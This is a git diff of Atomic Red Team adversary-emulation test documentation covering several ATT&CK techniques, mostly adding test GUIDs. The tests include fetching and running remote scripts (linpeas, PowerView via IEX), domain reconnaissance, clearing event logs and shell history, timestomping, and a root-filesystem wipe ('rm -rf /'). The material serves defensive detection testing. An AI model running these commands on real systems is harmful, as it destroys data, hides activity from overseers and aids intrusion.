## Atomic Test #2 - Encoded VBS code execution + +auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa + This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005" A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required. You can validate this by opening WinWord -> File -> Account -> About Word - **Supported Platforms:** Windows @@ -105,7 +109,7 @@ try { $path = $wdApp.Path Stop-Process -Name "winword" if ($path.contains("(x86)")) { exit 1 } else { exit 0 } -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -119,17 +123,19 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #3 - Extract Memory via VBA + +auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 + This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word | String | Word| @@ -159,7 +165,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md index 01f280d0..216ee5fb 100644 --- a/atomics/T1059.006/T1059.006.md +++ b/atomics/T1059.006/T1059.006.md @@ -16,15 +16,17 @@ Python comes with many built-in packages to interact with the underlying system,
## Atomic Test #1 - Execute shell script via python's command mode arguement -Download and execute shell script and write to file then execute locally using Python -c (command mode) +auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb + +Download and execute shell script and write to file then execute locally using Python -c (command mode) **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh| | payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload| @@ -51,7 +53,7 @@ rm #{payload_file_name} ##### Check Prereq Commands: ```sh which_python=`which python`; python -V -$which_python -c 'import requests' 2>/dev/null; echo $? +$which_python -c 'import requests' 2>/dev/null; echo $? ``` ##### Get Prereq Commands: ```sh @@ -65,15 +67,17 @@ pip install requests
## Atomic Test #2 - Execute Python via scripts (Linux) -Create Python file (.py) that downloads and executes shell script via executor arguments +auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 + +Create Python file (.py) that downloads and executes shell script via executor arguments **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | python_script_name | Python script name | Path | T1059.006.py| | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh| @@ -111,7 +115,7 @@ rm #{python_script_name} #{payload_file_name} ##### Check Prereq Commands: ```sh which_python=`which python`; python -V -$which_python -c 'import requests' 2>/dev/null; echo $? +$which_python -c 'import requests' 2>/dev/null; echo $? ``` ##### Get Prereq Commands: ```sh @@ -125,15 +129,17 @@ pip install requests
## Atomic Test #3 - Execute Python via Python executables (Linux) -Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments +auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa + +Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | python_script_name | Name of Python script name | Path | T1059.006.py| | script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh| @@ -173,7 +179,7 @@ rm #{python_binary_name} #{python_script_name} #{payload_file_name} ##### Check Prereq Commands: ```sh which_python=`which python`; python -V -$which_python -c 'import requests' 2>/dev/null; echo $? +$which_python -c 'import requests' 2>/dev/null; echo $? ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md index 55a48f28..05acf215 100644 --- a/atomics/T1069.001/T1069.001.md +++ b/atomics/T1069.001/T1069.001.md @@ -16,8 +16,10 @@ Commands such as net localgroup of the [Net](https://attack.mitre.o
## Atomic Test #1 - Permission Groups Discovery (Local) -Permission Groups Discovery +auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae + +Permission Groups Discovery **Supported Platforms:** macOS, Linux @@ -42,9 +44,11 @@ if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from
## Atomic Test #2 - Basic Permission Groups Discovery Windows (Local) + +auto_generated_guid: 1f454dd6-e134-44df-bebb-67de70fb6cd8 + Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows @@ -68,9 +72,11 @@ net localgroup "Administrators"
## Atomic Test #3 - Permission Groups Discovery PowerShell (Local) + +auto_generated_guid: a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 + Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 47d17a9b..228f6b73 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -26,9 +26,11 @@ Commands such as net group /domain of the [Net](https://attack.mitr
## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain) + +auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d + Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows @@ -54,16 +56,18 @@ net group "enterprise admins" /domain
## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain) + +auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 + Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user | User to identify what groups a user is a member of | string | administrator| @@ -84,9 +88,11 @@ get-ADPrincipalGroupMembership #{user} | select name
## Atomic Test #3 - Elevated group enumeration using net group (Domain) + +auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 + Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - **Supported Platforms:** Windows @@ -112,8 +118,10 @@ net group "BUILTIN\Backup Operators" /doma
## Atomic Test #4 - Find machines where user has local admin access (PowerView) -Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. +auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1 + +Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. **Supported Platforms:** Windows @@ -137,8 +145,10 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #5 - Find local admins on all machines in domain (PowerView) -Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed. +auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd + +Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed. **Supported Platforms:** Windows @@ -162,15 +172,17 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #6 - Find Local Admins via Group Policy (PowerView) -takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. +auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a + +takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME| @@ -192,8 +204,10 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast) -When successful, accounts that do not require kerberos pre-auth will be returned +auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b + +When successful, accounts that do not require kerberos pre-auth will be returned **Supported Platforms:** Windows @@ -214,7 +228,7 @@ get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq ##### Description: Computer must be domain joined. ##### Check Prereq Commands: ```powershell -if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -223,7 +237,7 @@ Write-Host Joining this computer to a domain must be done manually. ##### Description: Requires the Active Directory module for powershell to be installed. ##### Check Prereq Commands: ```powershell -if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} +if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -237,16 +251,18 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
## Atomic Test #8 - Adfind - Query Active Directory Groups + +auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -265,7 +281,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index b1f7c663..81e61b56 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -22,15 +22,17 @@ These logs may also be cleared through other mechanisms, such as the event viewe
## Atomic Test #1 - Clear Logs -Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. +auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967 + +Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | log_name | Windows Log Name, ex System | String | System| @@ -51,10 +53,12 @@ wevtutil cl #{log_name}
## Atomic Test #2 - Delete System Logs Using Clear-EventLog + +auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498 + Clear event logs using built-in PowerShell commands. Upon successful execution, you should see the list of deleted event logs Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. - **Supported Platforms:** Windows @@ -79,10 +83,12 @@ Get-EventLog -list
## Atomic Test #3 - Clear Event Logs via VBA + +auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e + This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error - **Supported Platforms:** Windows @@ -109,7 +115,7 @@ try { New-Object -COMObject "Word.Application" | Out-Null Stop-Process -Name "winword" exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md index 9600f758..2715a141 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1070.002/T1070.002.md @@ -23,8 +23,10 @@
## Atomic Test #1 - rm -rf -Delete system and audit logs +auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 + +Delete system and audit logs **Supported Platforms:** macOS, Linux @@ -48,15 +50,17 @@ sudo rm -rf /private/var/audit/*
## Atomic Test #2 - Overwrite Linux Mail Spool -This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. +auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4 + +This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of mail spool | String | root| @@ -77,15 +81,17 @@ echo 0> /var/spool/mail/#{username}
## Atomic Test #3 - Overwrite Linux Log -This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. +auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 + +This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | log_path | Path of specified log | Path | /var/log/secure| diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index f2aa13b5..4152771e 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md @@ -40,8 +40,10 @@ Adversaries may run the PowerShell command Clear-History to flush t
## Atomic Test #1 - Clear Bash history (rm) -Clears bash history via rm +auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc + +Clears bash history via rm **Supported Platforms:** Linux, macOS @@ -64,8 +66,10 @@ rm ~/.bash_history
## Atomic Test #2 - Clear Bash history (echo) -Clears bash history via rm +auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 + +Clears bash history via rm **Supported Platforms:** Linux @@ -88,8 +92,10 @@ echo "" > ~/.bash_history
## Atomic Test #3 - Clear Bash history (cat dev/null) -Clears bash history via cat /dev/null +auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f + +Clears bash history via cat /dev/null **Supported Platforms:** Linux, macOS @@ -112,8 +118,10 @@ cat /dev/null > ~/.bash_history
## Atomic Test #4 - Clear Bash history (ln dev/null) -Clears bash history via a symlink to /dev/null +auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 + +Clears bash history via a symlink to /dev/null **Supported Platforms:** Linux, macOS @@ -136,8 +144,10 @@ ln -sf /dev/null ~/.bash_history
## Atomic Test #5 - Clear Bash history (truncate) -Clears bash history via truncate +auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 + +Clears bash history via truncate **Supported Platforms:** Linux @@ -160,8 +170,10 @@ truncate -s0 ~/.bash_history
## Atomic Test #6 - Clear history of a bunch of shells -Clears the history of a bunch of different shell types by setting the history size to zero +auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c + +Clears the history of a bunch of different shell types by setting the history size to zero **Supported Platforms:** Linux, macOS @@ -186,8 +198,10 @@ history -c
## Atomic Test #7 - Clear and Disable Bash History Logging -Clears the history and disable bash history logging of the current shell and future shell sessions +auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 + +Clears the history and disable bash history logging of the current shell and future shell sessions **Supported Platforms:** Linux, macOS @@ -219,8 +233,10 @@ set -o history
## Atomic Test #8 - Use Space Before Command to Avoid Logging to History -Using a space before a command causes the command to not be logged in the Bash History file +auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 + +Using a space before a command causes the command to not be logged in the Bash History file **Supported Platforms:** Linux, macOS @@ -244,8 +260,10 @@ whoami
## Atomic Test #9 - Disable Bash History Logging with SSH -T -Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog +auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1 + +Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog **Supported Platforms:** Linux @@ -271,7 +289,7 @@ userdel -f testuser1 ##### Check Prereq Commands: ```sh /usr/sbin/useradd testuser1 -echo pwd101! | passwd testuser1 --stdin +echo pwd101! | passwd testuser1 --stdin ``` ##### Get Prereq Commands: ```sh @@ -286,8 +304,10 @@ yum -y install sshpass
## Atomic Test #10 - Prevent Powershell History Logging -Prevents Powershell history +auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 + +Prevents Powershell history **Supported Platforms:** Windows @@ -314,8 +334,10 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
## Atomic Test #11 - Clear Powershell History by Deleting History File -Clears Powershell history +auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 + +Clears Powershell history **Supported Platforms:** Windows diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md index 9552d0c2..783f63dc 100644 --- a/atomics/T1070.004/T1070.004.md +++ b/atomics/T1070.004/T1070.004.md @@ -30,15 +30,17 @@ There are tools available from the host operating system to perform cleanup, but
## Atomic Test #1 - Delete a single file - Linux/macOS -Delete a single file from the temporary directory +auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 + +Delete a single file from the temporary directory **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | Path of file to delete | Path | /tmp/victim-files/a| @@ -59,15 +61,17 @@ rm -f #{file_to_delete}
## Atomic Test #2 - Delete an entire folder - Linux/macOS -Recursively delete the temporary directory and all files contained within it +auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e + +Recursively delete the temporary directory and all files contained within it **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Path of folder to delete | Path | /tmp/victim-files| @@ -88,15 +92,17 @@ rm -rf #{folder_to_delete}
## Atomic Test #3 - Overwrite and delete a file with shred -Use the `shred` command to overwrite the temporary file and then delete it +auto_generated_guid: 039b4b10-2900-404b-b67f-4b6d49aa6499 + +Use the `shred` command to overwrite the temporary file and then delete it **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt| @@ -117,16 +123,18 @@ shred -u #{file_to_shred}
## Atomic Test #4 - Delete a single file - Windows cmd + +auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 + Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1551.004| @@ -145,7 +153,7 @@ del /f #{file_to_delete} ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete}) ##### Check Prereq Commands: ```cmd -IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -159,16 +167,18 @@ echo deleteme_T1551.004 >> #{file_to_delete}
## Atomic Test #5 - Delete an entire folder - Windows cmd + +auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 + Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1551.004| @@ -187,7 +197,7 @@ rmdir /s /q #{folder_to_delete} ##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete}) ##### Check Prereq Commands: ```cmd -IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -201,15 +211,17 @@ mkdir #{folder_to_delete}
## Atomic Test #6 - Delete a single file - Windows PowerShell -Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. +auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 + +Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_T1551.004| @@ -228,7 +240,7 @@ Remove-Item -path #{file_to_delete} ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} +if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -242,15 +254,17 @@ New-Item -Path #{file_to_delete} | Out-Null
## Atomic Test #7 - Delete an entire folder - Windows PowerShell -Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. +auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 + +Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_folder_T1551.004| @@ -269,7 +283,7 @@ Remove-Item -Path #{folder_to_delete} -Recurse ##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} +if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -283,8 +297,10 @@ New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
## Atomic Test #8 - Delete Filesystem - Linux -This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. +auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 + +This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. **Supported Platforms:** Linux @@ -307,9 +323,11 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
## Atomic Test #9 - Delete Prefetch File + +auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb + Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" before and after the test to verify that the number of prefetch files decreases by 1. - **Supported Platforms:** Windows @@ -332,19 +350,21 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
## Atomic Test #10 - Delete TeamViewer Log Files + +auto_generated_guid: 69f50a5f-967c-4327-a5bb-e1a9a9983785 + Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20 - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\TeamViewer_54.log| @@ -363,7 +383,7 @@ Remove-Item #{teamviewer_log_file} ##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} +if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1070.005/T1070.005.md b/atomics/T1070.005/T1070.005.md index ca630c36..f784ce96 100644 --- a/atomics/T1070.005/T1070.005.md +++ b/atomics/T1070.005/T1070.005.md @@ -14,15 +14,17 @@
## Atomic Test #1 - Add Network Share -Add a Network Share utilizing the command_prompt +auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 + +Add a Network Share utilizing the command_prompt **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Share to add. | string | \\test\share| @@ -44,15 +46,17 @@ net share test=#{share_name} /REMARK:"test share" /CACHE:No
## Atomic Test #2 - Remove Network Share -Removes a Network Share utilizing the command_prompt +auto_generated_guid: 09210ad5-1ef2-4077-9ad3-7351e13e9222 + +Removes a Network Share utilizing the command_prompt **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Share to remove. | string | \\test\share| @@ -73,15 +77,17 @@ net share #{share_name} /delete
## Atomic Test #3 - Remove Network Share PowerShell -Removes a Network Share utilizing PowerShell +auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 + +Removes a Network Share utilizing PowerShell **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Share to remove. | string | \\test\share| diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md index 224f3a98..11fb1413 100644 --- a/atomics/T1070.006/T1070.006.md +++ b/atomics/T1070.006/T1070.006.md @@ -26,15 +26,17 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
## Atomic Test #1 - Set a file's access timestamp -Stomps on the access timestamp of a file +auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 + +Stomps on the access timestamp of a file **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| @@ -55,15 +57,17 @@ touch -a -t 197001010000.00 #{target_filename}
## Atomic Test #2 - Set a file's modification timestamp -Stomps on the modification timestamp of a file +auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 + +Stomps on the modification timestamp of a file **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| @@ -84,18 +88,20 @@ touch -m -t 197001010000.00 #{target_filename}
## Atomic Test #3 - Set a file's creation timestamp + +auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b + Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| @@ -120,17 +126,19 @@ stat #{target_filename}
## Atomic Test #4 - Modify file timestamps using reference file + +auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 + Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_file_path | Path of file to modify timestamps of | Path | /opt/filename| | reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh| @@ -152,16 +160,18 @@ touch -acmr #{reference_file_path} #{target_file_path}
